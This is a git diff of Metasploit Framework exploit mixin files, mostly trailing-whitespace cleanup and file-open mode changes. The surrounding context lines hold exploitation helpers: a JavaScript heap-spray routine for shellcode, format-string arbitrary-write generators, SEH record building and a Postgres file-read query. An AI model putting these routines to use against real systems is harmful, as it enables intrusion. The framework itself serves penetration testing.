diff --git a/lib/msf/core/exploit/arkeia.rb b/lib/msf/core/exploit/arkeia.rb index 287f9ae093..6080218337 100644 --- a/lib/msf/core/exploit/arkeia.rb +++ b/lib/msf/core/exploit/arkeia.rb @@ -8,9 +8,9 @@ module Msf # ### module Exploit::Remote::Arkeia - + include Exploit::Remote::Tcp - + # # Creates an instance of a MSSQL exploit module. # @@ -26,8 +26,8 @@ module Exploit::Remote::Arkeia self.recv_buff = '' end - - + + # # Flush the receive buffer on a new connection # @@ -35,13 +35,13 @@ module Exploit::Remote::Arkeia super self.recv_buff = '' end - + # # This method dumps some information about the service # def arkeia_info connect - + info = { } resp = '' @@ -63,14 +63,14 @@ module Exploit::Remote::Arkeia "\x00\x34\x2e\x33\x2e\x30\x2d\x31"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x60\x00\x04") disconnect return false end - + # Authenticate2 req = "\x00\x73\x00\x00\x00\x00\x00\x0c" + @@ -82,22 +82,22 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,4] == "\x00\x60\x00\x04") disconnect return false - end - + end + # SessionSetup1 - req = + req = "\x00\x61\x00\x04\x00\x01\x00\x15"+ "\x00\x00\x31\x35\x33\x39\x38\x00"+ "\x45\x4e\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x43\x00\x00") disconnect return false end - + # Begin the ARKADMIN_GET_CLIENT_INFO request req = "\x00\x62\x00\x01\x00\x02\x00\x25"+ @@ -106,33 +106,33 @@ module Exploit::Remote::Arkeia "\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+ "\x00\x32\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00" - + sock.put(req) resp = arkeia_recv() if !(resp and resp[0,4] == "\x00\x43\x00\x00") disconnect return false - end - + end + # Complete the ARKADMIN_GET_CLIENT_INFO request req = "\x00\x63\x00\x04\x00\x03\x00\x11"+ "\x30\x00\x31\x00\x32\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00" - - sock.put(req) + + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() break if not resp break if resp =~ /VERSION/ } - + if !(resp and resp =~ /VERSION/) disconnect return false end - + # Store the version information mver = resp.match(/IVERSION\x00([^\x00]+)/) info['Version'] = mver[1] if mver @@ -140,7 +140,7 @@ module Exploit::Remote::Arkeia # Store the hostname information mver = resp.match(/ISERVNAME\x00([^\x00]+)/) info['Hostname'] = mver[1] if mver - + # Begin the ARKADMIN_GET_MACHINE_INFO request req = "\x00\x62\x00\x01\x00\x02\x00\x26"+ @@ -149,7 +149,7 @@ module Exploit::Remote::Arkeia "\x48\x49\x4e\x45\x5f\x49\x4e\x46"+ "\x4f\x00\x33\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00" - + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() @@ -159,15 +159,15 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,2] == "\x00\x43") disconnect return info - end - + end + # Complete the ARKADMIN_GET_MACHINE_INFO request req = "\x00\x63\x00\x04\x00\x03\x00\x11"+ "\x30\x00\x31\x00\x33\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00" - + sock.put(req) 1.upto(5) { |i| resp = arkeia_recv() @@ -177,7 +177,7 @@ module Exploit::Remote::Arkeia if !(resp and resp[0,2] == "\x00\x69") disconnect return info - end + end # Finally, parse out and store all the parameters resp.split("TPVALUE\x00").each { |x| @@ -186,11 +186,11 @@ module Exploit::Remote::Arkeia info[ minf[2] ] = minf[1] end } - + disconnect return info end - + # # This method reads from the socket and parses out a single # arkeia response, buffering the rest @@ -203,19 +203,19 @@ module Exploit::Remote::Arkeia if (self.recv_buff.length < 8) return false end - + # Read the length header out of the message dlen = self.recv_buff[6, 2].unpack('n')[0] - + # Do we have the entire response message? if (self.recv_buff.length >= dlen + 8) return self.recv_buff.slice!(0, dlen + 8) end - + return false end - - + + attr_accessor :recv_buff end end \ No newline at end of file diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index b5eb542e33..adcca8f857 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ diff --git a/lib/msf/core/exploit/brute.rb b/lib/msf/core/exploit/brute.rb index f5afe70f60..0515f7545e 100644 --- a/lib/msf/core/exploit/brute.rb +++ b/lib/msf/core/exploit/brute.rb @@ -47,7 +47,7 @@ module Exploit::Brute stop = bf.stop_addresses ? bf.stop_addresses.dup : {} step = bf.step_size delay = bf.delay - + # Enumerate each start address and try to figure out the direction start.each_pair { |name, addr| # If there's a stop address, figure out if it's above or below @@ -64,7 +64,7 @@ module Exploit::Brute direction[name] = bf.default_direction end } - + # Import start/stop address overrides from the datastore import_from_datastore(start, 'Start') import_from_datastore(stop, 'Stop') @@ -101,7 +101,7 @@ module Exploit::Brute # Stop brute forcing once a session is found break if session_created? - + # Fire off an exploit attempt with the supplied addresses brute_exploit(curr) @@ -119,16 +119,16 @@ module Exploit::Brute # we're going to go over next_addr = step * direction[k] - # If this item has hit a stop address, add it to the stopped + # If this item has hit a stop address, add it to the stopped # hash and move it no further if (stop[k]) if ((direction[k] == 1 and curr[k] + next_addr >= stop[k]) or - (direction[k] == -1 and curr[k] + next_addr < stop[k])) + (direction[k] == -1 and curr[k] + next_addr < stop[k])) stopped << k next end end - + # If it's not time to stop, move it curr[k] += next_addr } @@ -141,7 +141,7 @@ module Exploit::Brute # # This routine is called once per brute force iteration. The addresses # parameter is a hash of addresses that are incremented each iteration and - # are derived from the target's bruteforce information or the module's + # are derived from the target's bruteforce information or the module's # datastore in case they are being overriden. # def brute_exploit(addrs) @@ -164,8 +164,8 @@ protected # # Imports information into the supplied hash from the datastore. - # This is a way of allowing the user to override values for a - # specific brute force target by name without them actually + # This is a way of allowing the user to override values for a + # specific brute force target by name without them actually # being conveyed in the options list. This is a bit of a change # from 2.x, but 2.x didn't have per-target brute force # addresses, which I think is more valuable. diff --git a/lib/msf/core/exploit/db2.rb b/lib/msf/core/exploit/db2.rb index 45adbc254b..3cc16fa3f6 100644 --- a/lib/msf/core/exploit/db2.rb +++ b/lib/msf/core/exploit/db2.rb @@ -28,10 +28,10 @@ module Exploit::Remote::DB2 ], Msf::Exploit::Remote::DB2) end - + # # This method sends a TCP query packet to the server, using - # datastore options and parses out the reply packet + # datastore options and parses out the reply packet # into a hash # def db2_probe(timeout=5) diff --git a/lib/msf/core/exploit/dect_coa.rb b/lib/msf/core/exploit/dect_coa.rb index 64b5a12f35..aa58712f1c 100644 --- a/lib/msf/core/exploit/dect_coa.rb +++ b/lib/msf/core/exploit/dect_coa.rb @@ -52,7 +52,7 @@ module Exploit::DECT_COA close_coa if self.dect_device begin - self.dect_device = File.open(datastore['INTERFACE'], "w+") + self.dect_device = File.open(datastore['INTERFACE'], "wb+") rescue ::Exception => e print_error("Could not open the Com-On-Air device at #{datastore['INTERFACE']}") print_error("This module only works on Linux with the appropriate hardware and driver, while running as root") @@ -139,13 +139,13 @@ module Exploit::DECT_COA when DECT_BAND_BOTH if (channel < 9) - set_channel(channel + 1) + set_channel(channel + 1) elsif (channel == 9) - set_channel(23) + set_channel(23) elsif (channel > 9 && channel < 27) - set_channel(channel + 1) + set_channel(channel + 1) else - set_channel(0) + set_channel(0) end end end @@ -173,7 +173,7 @@ module Exploit::DECT_COA end def parse_call(data) - { + { 'channel' => data[0], 'rssi' => data[1], 'rfpi_raw' => data[2,5], @@ -183,7 +183,7 @@ module Exploit::DECT_COA def record_coa(filename) raise RuntimeError, "DECT call recording is not supported yet" - fd = File.open(filename, 'rw') + fd = File.open(filename, 'rb+') fd.close end diff --git a/lib/msf/core/exploit/dialup.rb b/lib/msf/core/exploit/dialup.rb index aac7897474..530b351153 100644 --- a/lib/msf/core/exploit/dialup.rb +++ b/lib/msf/core/exploit/dialup.rb @@ -22,24 +22,24 @@ module Exploit::Remote::Dialup ], self.class) deregister_options('RHOST') - + begin require 'telephony' @telephony_loaded = true rescue ::Exception => e @telephony_loaded = false @telephony_error = e - end + end end # Opens the modem connection def connect_dialup(global = true, opts={}) - + if (not @telephony_loaded) print_status("The serialport module is not available: #{telephony_error}") raise RuntimeError, "Telephony not available" end - + serialport = datastore['SERIALPORT'] baud = datastore['BAUDRATE'].to_i data_bits = datastore['DATABITS'].to_i @@ -57,7 +57,7 @@ module Exploit::Remote::Dialup when 'Both' ; Telephony::Modem::HARD | Telephony::Modem::SOFT else Telephony::Modem::NONE end - + initstring = datastore['INITSTRING'] dialprefix = datastore['DIALPREFIX'] dialsuffix = datastore['DIALSUFFIX'] @@ -108,7 +108,7 @@ module Exploit::Remote::Dialup end end - # Closes the modem connection + # Closes the modem connection def disconnect_dialup(nmodem = self.modem) if(nmodem) nmodem.flush @@ -136,7 +136,7 @@ module Exploit::Remote::Dialup while c c = self.modem.getc res[:buffer] += c.chr if c - end + end return res end end @@ -181,7 +181,7 @@ module Exploit::Remote::Dialup return rv end - + attr_accessor :modem end diff --git a/lib/msf/core/exploit/fmtstr.rb b/lib/msf/core/exploit/fmtstr.rb index 8cdb9ea304..4a0a92a3f0 100644 --- a/lib/msf/core/exploit/fmtstr.rb +++ b/lib/msf/core/exploit/fmtstr.rb @@ -16,12 +16,12 @@ module Exploit::FormatString # def initialize(info = {}) super - + @use_fpu = false @use_dpa = false end - - + + # # Allow caller to override the capabilities # @@ -29,7 +29,7 @@ module Exploit::FormatString @use_fpu = fpu @use_dpa = dpa end - + # # Detect the capabilities (only works for non-blind) # @@ -38,7 +38,7 @@ module Exploit::FormatString @use_fpu = fmtstr_detect_cap_fpu #print_status("support dpa:#{@use_dpa.to_s}, fpu:#{@use_fpu.to_s}") end - + def fmtstr_detect_cap_dpa res = trigger_fmt("|%1$08x|") return nil if not res @@ -48,7 +48,7 @@ module Exploit::FormatString end return false end - + def fmtstr_detect_cap_fpu res = trigger_fmt("|%g|") return nil if not res @@ -58,7 +58,7 @@ module Exploit::FormatString end return false end - + def fmtstr_detect_vulnerable res = trigger_fmt("|%08x|") return false if not res @@ -68,7 +68,7 @@ module Exploit::FormatString end return false end - + # NOTE: This will likely crash the target process def fmtstr_detect_exploitable begin @@ -83,40 +83,40 @@ module Exploit::FormatString end return false end - - + + # # Generates a format string that will perform an arbitrary write using # two separate short values # def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target) - + arr = Array.new arr << [ write_what & 0xffff, write_to ] arr << [ write_what >> 16, write_to + 2 ] - + stuff = fmtstr_gen_from_array(num_printed, arr, targ) end - + # # Generates a format string that will perform an arbitrary write using # two separate short values # def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target) - + # break buffer into shorts arr = fmtstr_gen_array_from_buf(write_to, buffer, targ) - + # now build the format string in its entirety stuff = fmtstr_gen_from_array(num_printed, arr, targ) end - - + + # # Generates and returns an array of what/where pairs from the supplied buffer # def fmtstr_gen_array_from_buf(write_to, buffer, targ = target) - + # break buffer into shorts arr = Array.new off = 0 @@ -128,13 +128,13 @@ module Exploit::FormatString tb = buffer[off,2].unpack('v')[0].to_i #print_status("%d %d %d" % [off,buffer.length,tb]) addr = write_to + off - + arr << [ tb, addr ] off += 2 end return arr end - + # # Generates a format string from an array of value/address pairs # @@ -144,7 +144,7 @@ module Exploit::FormatString # sort the array -- for optimization arr = arr.sort { |x,y| x[0] <=> y[0] } - + # build up the addrs and fmts buffers fmts = "" addrs = "" @@ -152,18 +152,18 @@ module Exploit::FormatString arr.each do |el| # find out how much to advance the column value prec = fmtstr_target_short(el[0], num) - + # for non-dpa, if the prec is more than 8, we need something to pop if not @use_dpa and prec >= 8 addrs << rand_text(4) end - + # write here! addrs << [el[1]].pack('V') - + # put our advancement fmt (or bytes) fmts << fmtstr_advance_count(prec) - + # fmt to cause the write :) if @use_dpa fmts << "%" + num_pops.to_s + "$hn" @@ -171,11 +171,11 @@ module Exploit::FormatString else fmts << "%hn" end - + # update written count num = el[0] end - + # make sure we dont have bad characters ... if (bad_idx = has_badchars?(addrs, payload_badchars)) raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]), @@ -190,16 +190,16 @@ module Exploit::FormatString stuff << "%8x" * num_pops end stuff << fmts - + return stuff end - - + + # # Count how many bytes will print before we reach the writing.. # def fmtstr_count_printed(num_printed, num_pad, num_pops, arr) - + num = num_printed + num_pad if not @use_dpa num += (8 * num_pops) @@ -211,43 +211,43 @@ module Exploit::FormatString if not @use_dpa and prec >= 8 num += 4 end - + # account for the addr to write to num += 4 npr = el[0] end return num end - + # # Generate the number to be used for precision that will create # the specified value to write - # + # def fmtstr_target_short(value, num_printed) if value < num_printed return (0x10000 - num_printed) + value end return value - num_printed end - + # # Generate a fmt that will advance the printed count by the specified amount # def fmtstr_advance_count(prec) - + # no need to advance :) return "" if prec == 0 - + # asumming %x max normal length is 8... if prec >= 8 return "%0" + prec.to_s + "x" end - + # anything else, we just put some chars in... return rand_text(prec) end - - + + # # Returns the index of any bad characters found in the supplied buffer. # (NOTE: copied from encoder.rb) @@ -263,7 +263,7 @@ module Exploit::FormatString return nil end - + # # Read a single 32-bit integer from the stack at the specified offset # @@ -271,7 +271,7 @@ module Exploit::FormatString # cant read offset 0! return nil if offset < 1 - + fmt = '' fmt << extra if @use_dpa @@ -286,14 +286,14 @@ module Exploit::FormatString fmt << "|" fmt << "%x" end - + res = trigger_fmt(fmt) return res if not res - + numstr = extract_fmt_output(res) dw = numstr.split('|')[1].to_i(16) end - + end end diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 80d716aa19..73dc44ffa2 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -88,8 +88,8 @@ module Exploit::Remote::HttpClient # def validate_fingerprint() # Don't bother checking if there's no database active. - if (framework.db.active and - datastore['FingerprintCheck'] and + if (framework.db.active and + datastore['FingerprintCheck'] and self.class.const_defined?('HttpFingerprint')) # Get the module-specific config opts = self.class.const_get('HttpFingerprint') @@ -180,16 +180,15 @@ module Exploit::Remote::HttpClient # def handler(nsock = nil) # If no socket was provided, try the global one. - if ((!nsock) and - (self.client)) + if ((!nsock) and (self.client)) nsock = self.client.conn end # If the parent claims the socket associated with the HTTP client, then # we rip the socket out from under the HTTP client. if (((rv = super(nsock)) == Handler::Claimed) and - (self.client) and - (nsock == self.client.conn)) + (self.client) and + (nsock == self.client.conn)) self.client.conn = nil end diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 8157d7a8dd..3d4d17496d 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -590,20 +590,20 @@ protected def js_heap_spray js = %Q|var memory = new Array(); function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { - var index; - var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); - var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); - while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } - while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } + var index; + var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); + var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); + while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } + while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } - var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); - while (retSlide.length < heapBlockSize) { retSlide += retSlide; } - retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); + var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); + while (retSlide.length < heapBlockSize) { retSlide += retSlide; } + retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); - var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; - for (index = 0; index < heapBlockCnt; index++) { - memory[index] = retSlide + shellcode; - } + var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; + for (index = 0; index < heapBlockCnt; index++) { + memory[index] = retSlide + shellcode; + } } | opts = { diff --git a/lib/msf/core/exploit/ip.rb b/lib/msf/core/exploit/ip.rb index 349b9e2072..ed33d61c63 100644 --- a/lib/msf/core/exploit/ip.rb +++ b/lib/msf/core/exploit/ip.rb @@ -24,7 +24,7 @@ module Exploit::Remote::Ip # Creates an IP socket for communicating with a remote host # def connect_ip(global = true, opts={}) - + begin nsock = Rex::Socket::Ip.create( 'Context' => @@ -66,12 +66,12 @@ module Exploit::Remote::Ip if (nsock == ip_sock) self.ip_sock = nil end - + # Remove this socket from the list of sockets created by this exploit remove_socket(nsock) end - # + # # Claims the IP socket if the payload so desires. # No exploits use raw socket payloads yet... # diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb index c5a97b9230..c60990e62b 100644 --- a/lib/msf/core/exploit/java.rb +++ b/lib/msf/core/exploit/java.rb @@ -19,11 +19,11 @@ module Exploit::Java def initialize(info = {}) super - + register_advanced_options( [ - OptString.new( 'JavaCache', [true, 'Java cache location', - File.join(Msf::Config.config_directory, "javacache")]), + OptString.new( 'JavaCache', [true, 'Java cache location', + File.join(Msf::Config.config_directory, "javacache")]), OptString.new( 'AddClassPath', [false, 'Additional java classpath', nil]), ], self.class) @@ -53,14 +53,14 @@ module Exploit::Java @jvm_init = true end - + def query_jvm return @jvmInit end - + def save_to_file(classnames, codez, location) path = File.join( Msf::Config.install_root, "external", "source", location ) - + if not File.exists? path Dir.mkdir(path) end @@ -68,7 +68,7 @@ module Exploit::Java i = 0 classnames.each { |fil| file = File.join( path, fil + ".java") - fp = File.open( file, "w" ) + fp = File.open( file, "wb" ) print_status "Writing #{fil} to " + file fp.puts codez[i] i += 1 @@ -80,34 +80,34 @@ module Exploit::Java if !@rjb_loaded or !@jvm_init raise RuntimeError, "Could not load rjb and/or the JVM: " + @java_error.to_s end - + if compile_options.class.to_s != "Array" && compile_options raise RuntimeError, "Compiler options must be of type Array." end - + compile_options = [] if compile_options.nil? # Create the directory if it doesn't exist Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache'] - + # For compatibility, some exploits need to have the target and source version # set to a previous JRE version. std_compiler_opts = [ "-target", "1.3", "-source", "1.3", "-d", datastore['JavaCache'] ] compile_options += std_compiler_opts - + java_compiler_klass = Rjb::import('javaCompile.CompileSourceInMemory') # If we were passed arrays if classnames.class == [].class && codez.class == [].class # default compile class begin - # Sames as java_compiler_klass.CompileFromMemory( String[] classnames, + # Sames as java_compiler_klass.CompileFromMemory( String[] classnames, # String[] codez, String[] compilerOptions) success = java_compiler_klass._invoke('CompileFromMemory', # Signature explained: [ means array, Lpath.to.object; means object # Thus, this reads as call the method with 3 String[] args. - '[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', + '[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', classnames, codez, compile_options) rescue Exception => e print_error "Received unknown error: " + e @@ -116,10 +116,10 @@ module Exploit::Java raise RuntimeError, "The Java mixin received unknown argument-type combinations and cannot continue." end if !success - raise RuntimeError, "Compile failed." + raise RuntimeError, "Compile failed." end end - + def build_jar(output_jar, in_files) if output_jar.class != "".class || in_files.class != [].class raise RuntimeError, "Building a jar requires an output_jar and an Array of in_files." @@ -127,7 +127,7 @@ module Exploit::Java # Add paths in_files = in_files.map { |file| File.join(datastore['JavaCache'], file) } - + create_jar_klass = Rjb::import('javaCompile.CreateJarFile') file_class = Rjb::import('java.io.File') @@ -141,8 +141,8 @@ module Exploit::Java # # http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf # - def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", - msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") + def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", + msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") # Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK. signer_klass = Rjb::import('javaCompile.SignJar') @@ -150,29 +150,33 @@ module Exploit::Java # Check if the keystore exists from previous run. If it does, delete it. msf_keystore = File.join(datastore['JavaCache'], msf_keystore) File.delete msf_keystore if File.exists? msf_keystore - + # Rjb pukes on a CN with a comma in it so bad that it crashes to shell # and turns input echoing off. Simple fix for this ugly bug is # just to get rid of commas which kinda sucks but whatever. See #1543. - keytool_opts = ["-genkey", "-alias", cert_alias, "-keystore", msf_keystore, - "-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}", - "-keypass", "msfkeypass"] - + keytool_opts = [ + "-genkey", "-alias", cert_alias, "-keystore", msf_keystore, + "-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}", + "-keypass", "msfkeypass" + ] + # Build the cert keystore signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts) - jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass, - "-keypass", msf_key_pass, "-signedJar", - File.join(datastore['JavaCache'], signed_jar), # Signed Jar - File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing - cert_alias] # The cert we're using + jarsigner_opts = [ + "-keystore", msf_keystore, "-storepass", msf_store_pass, + "-keypass", msf_key_pass, "-signedJar", + File.join(datastore['JavaCache'], signed_jar), # Signed Jar + File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing + cert_alias # The cert we're using + ] signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts) - + # There are warnings in the source for KeyTool/JarSigner warning that security providers # are not released, and if you are calling .main(foo) from another app, you need to release # them manually. This is not done here, and should Rjb be used for anything in the future, # this may need to be cleaned up. end - + end end diff --git a/lib/msf/core/exploit/kernel_mode.rb b/lib/msf/core/exploit/kernel_mode.rb index 719e529ce5..dea13912d8 100644 --- a/lib/msf/core/exploit/kernel_mode.rb +++ b/lib/msf/core/exploit/kernel_mode.rb @@ -26,7 +26,7 @@ module Exploit::KernelMode end protected - + # # Encapsulates the supplied raw payload within a kernel-mode payload. # @@ -35,22 +35,22 @@ protected ext_opt = reqs['ExtendedOptions'] || {} # Prepend and append any buffers that were specified in the extended - # options. This can be used do perform stack adjustments and other + # options. This can be used do perform stack adjustments and other # such things against the user-mode payload rather than the # encapsulating payload. - raw = + raw = (ext_opt['PrependUser'] || '') + raw + (ext_opt['AppendUser'] || '') - # If this is a win32 target platform, try to encapsulate it in a + # If this is a win32 target platform, try to encapsulate it in a # win32 kernel-mode payload. if target_platform.supports?(Msf::Module::PlatformList.win32) ext_opt['UserModeStub'] = raw new_raw = Rex::Payloads::Win32::Kernel.construct(ext_opt) end - + # If we did not generate a new payload, then something broke. if new_raw.nil? raise RuntimeError, "Could not encapsulate payload in kernel-mode payload" diff --git a/lib/msf/core/exploit/pdf_parse.rb b/lib/msf/core/exploit/pdf_parse.rb old mode 100755 new mode 100644 index b49b2c90b0..2e0ad8f2ea --- a/lib/msf/core/exploit/pdf_parse.rb +++ b/lib/msf/core/exploit/pdf_parse.rb @@ -6,9 +6,7 @@ ### module Msf - - module Exploit::PDF_Parse - +module Exploit::PDF_Parse def initialize(info = {}) super @@ -248,10 +246,8 @@ module Msf end end - return xref_trailers, trailers, startxrefs, root_obj + return xref_trailers, trailers, startxrefs, root_obj end - end - end - +end diff --git a/lib/msf/core/exploit/pop2.rb b/lib/msf/core/exploit/pop2.rb index 42653b44cd..7c94fa4a7a 100644 --- a/lib/msf/core/exploit/pop2.rb +++ b/lib/msf/core/exploit/pop2.rb @@ -11,7 +11,7 @@ require 'msf/core/exploit/tcp' module Exploit::Remote::Pop2 include Exploit::Remote::Tcp - + # # Creates an instance of an POP2 exploit module. # @@ -37,7 +37,7 @@ module Exploit::Remote::Pop2 print_status("Connecting to POP2 server #{rhost}:#{rport}...") fd = super - + # Wait for a banner to arrive... self.banner = fd.get_once @@ -49,7 +49,7 @@ module Exploit::Remote::Pop2 end # - # Connect and login to the remote POP2 server using the credentials + # Connect and login to the remote POP2 server using the credentials # that have been supplied in the exploit options. # def connect_login(global = true) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 0057dd9dc2..4ee3cbafcd 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -54,7 +54,7 @@ module Exploit::Remote::Postgres uri = "tcp://#{ip}:#{port}" verbose = args[:verbose] || datastore['VERBOSE'] begin - self.postgres_conn = Connection.new(db,username,password,uri) + self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e case e.to_s.split("\t")[1] when "C3D000" @@ -63,14 +63,14 @@ module Exploit::Remote::Postgres when "C28000" print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose return :error_credentials - else + else print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose return :error end end if self.postgres_conn print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose - return :connected + return :connected end end @@ -83,7 +83,7 @@ module Exploit::Remote::Postgres self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn")) self.postgres_conn = nil end - print_status "#{ip}:#{port} Postgres - Disconnected" if verbose + print_status "#{ip}:#{port} Postgres - Disconnected" if verbose end # If not currently connected, postgres_query will attempt to connect. If an @@ -97,7 +97,7 @@ module Exploit::Remote::Postgres unless self.postgres_conn return {:conn_error => true} end - if self.postgres_conn + if self.postgres_conn sql ||= datastore['SQL'] print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE'] begin @@ -117,7 +117,7 @@ module Exploit::Remote::Postgres end return {:sql_error => sql_error_msg} end - postgres_print_reply(resp,sql) if doprint + postgres_print_reply(resp,sql) if doprint return {:complete => resp} end end @@ -158,14 +158,14 @@ module Exploit::Remote::Postgres uri = "tcp://#{rhost}:#{rport}" verbose = args[:verbose] || datastore['VERBOSE'] begin - self.postgres_conn = Connection.new(db,username,password,uri) + self.postgres_conn = Connection.new(db,username,password,uri) rescue RuntimeError => e version_hash = analyze_auth_error e - return version_hash + return version_hash end if self.postgres_conn # Just ask for the version. resp = postgres_query("select version()",false) - ver = resp[:complete].rows[0][0] + ver = resp[:complete].rows[0][0] return {:auth => ver} end end @@ -229,7 +229,7 @@ module Exploit::Remote::Postgres end def postgres_password - if datastore['PASSWORD'].to_s.size > 0 + if datastore['PASSWORD'].to_s.size > 0 datastore['PASSWORD'].to_s else Rex::Text.rand_text_english(rand(6)+2) @@ -246,7 +246,7 @@ module Exploit::Remote::Postgres end temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6) - read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT); + read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT); COPY #{temp_table_name} FROM '#{filename}'; SELECT * FROM #{temp_table_name}} read_return = postgres_query(read_query,true) diff --git a/lib/msf/core/exploit/seh.rb b/lib/msf/core/exploit/seh.rb index 8343e59cda..7fb90b4008 100644 --- a/lib/msf/core/exploit/seh.rb +++ b/lib/msf/core/exploit/seh.rb @@ -3,7 +3,7 @@ require 'rex/exploitation/seh' module Msf ### -# +# # This mixin provides an interface to generating SEH registration records in a # robust fashion using the Rex::Exploitation::Seh class. # @@ -38,7 +38,7 @@ module Exploit::Seh # random padding. This should be derived from the maximum amount of # space available to the exploit for payloads minus the current payload # size. - # + # def generate_seh_record(handler, opts = {}) seh = Rex::Exploitation::Seh.new( payload_badchars, @@ -48,12 +48,12 @@ module Exploit::Seh # Generate the record seh.generate_seh_record(handler, datastore['DynamicSehRecord']) end - + def generate_seh_payload(handler, opts = {}) - + # The boilerplate this replaces always has 8 bytes for seh + addr seh_space = 8 + payload.nop_sled_size - + seh = Rex::Exploitation::Seh.new( payload_badchars, seh_space, @@ -61,7 +61,7 @@ module Exploit::Seh # Generate the record rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord']) - + # Append the payload, minus the nop sled that we replaced rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length) end diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index 5fd6352138..2ab3d1c103 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC def progresolv(number) names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt") - File.open(names,"r").each_line do |line| + File.open(names, "rb").each_line do |line| next if line.empty? || line =~ /^\s*#/ if line =~ /^(\S+?)\s+(\d+)/ && number == $2.to_i diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 4856537262..db93d81608 100644 --- a/lib/msf/core/exploit/telnet.rb +++ b/lib/msf/core/exploit/telnet.rb @@ -13,74 +13,74 @@ module Exploit::Remote::Telnet include Exploit::Remote::Tcp # Borrowing constants from Ruby's Net::Telnet class (ruby license) - IAC = 255.chr # "\377" # "\xff" # interpret as command - 